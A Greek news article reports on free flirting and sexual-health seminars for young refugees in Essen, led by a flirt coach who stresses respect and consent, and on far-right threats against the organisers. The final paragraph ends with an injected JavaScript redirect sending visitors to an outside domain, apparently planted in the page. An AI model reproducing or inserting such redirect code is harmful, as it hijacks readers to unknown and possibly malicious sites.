Εντατικά μαθήματα… φλερτ για τους πρόσφυγες της Γερμανίας!

0
6

Σεμινάρια παρακολουθούν οι πρόσφυγες στο Έσσεν της Γερμανίας προκειμένου να μάθουν να φλερτάρουν με τον ενδεδειγμένο τρόπο!

Εδώ και έναν χρόνο περίπου ο ανεξάρτητος κοινωφελής σύλλογος AWO στο Έσσεν προσφέρει συμβουλευτικές υπηρεσίες σε μετανάστες για σεξουαλικά ζητήματα. Εκεί συζητούνται σε χαλαρή ατμόσφαιρα θέματα όπως ο έρωτας, η προφύλαξη, τα σεξουαλικώς μεταδιδόμενα νοσήματα, η εγκυμοσύνη και άλλα.

Την πρωτοβουλία στηρίζει και ο ειδικός σε ζητήματα φλερτ Χορστ Βέντσελ. Κανονικά πληρώνεται για τις υπηρεσίες του, αλλά στην περίπτωση των νεαρών προσφύγων δίνει τις συμβουλές του δωρεάν. «Προτείνω σε όποιον θέλει να προσαρμοστεί εδώ στη Γερμανία να αναζητήσει πρώτα έναν Γερμανό φίλο ή μια Γερμανίδα φίλη», λέει ο Χορστ Βέντσελ, σύμφωνα με την Deutsche Welle, προτείνοντας μάλιστα στους πρόσφυγες ακόμη και ηλεκτρονικές εφαρμογές για online dating.

Αντιδράσεις και απειλές από Ακροδεξιούς

Το σεμινάριο προκάλεσε πάντως σφοδρές αντιδράσεις. Ο Βέντσελ δέχθηκε μηνύματα γεμάτα απειλές και ύβρεις για την απόφασή του να συμβάλει σε αυτήν την πρωτοβουλία υπέρ των προσφύγων. Οι αντιδράσεις αυτές απλά του έδωσαν μεγαλύτερο κίνητρο να πραγματοποιήσει τα σχέδιά του. «Ακροδεξιοί μας κατηγόρησαν ότι θα μάθουμε στους πρόσφυγες πως να βιάζουν Γερμανίδες», αποκαλύπτει η διευθύντρια του συμβουλευτικού κέντρου Νίκολα Φέλκελ. Συνέπεια αυτών ήταν το σεμινάριο να διεξαχθεί υπό αστυνομική προστασία.

Το θετικό ήταν ότι οι νεαροί πρόσφυγες δεν αντιλήφθηκαν όσα είχαν συμβεί στο παρασκήνιο. Εντός του σεμιναριακού χώρου η ατμόσφαιρα ήταν άνετη. Με τους πρόσφυγες να κάνουν τις ερωτήσεις τους στον προπονητή του φλερτ. «Πώς καταλαβαίνω αν ένα κορίτσι θέλει να φιληθεί», ρωτά ένα αγόρι. «Γιατί τελειώνουν οι σχέσεις μετά από μερικές εβδομάδες», ρωτά κάποιος άλλος. «Επειδή οι άντρες θέλουν απλά να κάνουν σεξ», φωνάζει από τις πίσω σειρές ένας τρίτος. Από τη συζήτηση και την ανταλλαγή απόψεων γίνεται ολοένα πιο σαφές ότι το μεγαλύτερο εμπόδιο για μια γνωριμία είναι η ελλιπής γνώση της γλώσσας.

Ο Χορστ Βέντσελ δίνει πρακτικές συμβουλές στους νεαρούς πρόσφυγες. Τους λέει ότι το καλό σεξ είναι πολύ σημαντικό για να κρατήσει μια σχέση. Τους συμβουλεύει να προσέχουν σε ένα ραντεβού τι μηνύματα εκπέμπουν τα κορίτσια. Όταν αντιδρούν απορριπτικά σε μια κίνηση, είναι καλό να υποχωρούν. Τους λέει επίσης ότι ένα χαμόγελο δεν σημαίνει απαραίτητα ότι τα κορίτσια θέλουν φιλί. Και τους μαθαίνει ότι το σημαντικότερο όλων είναι ο σεβασμός. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here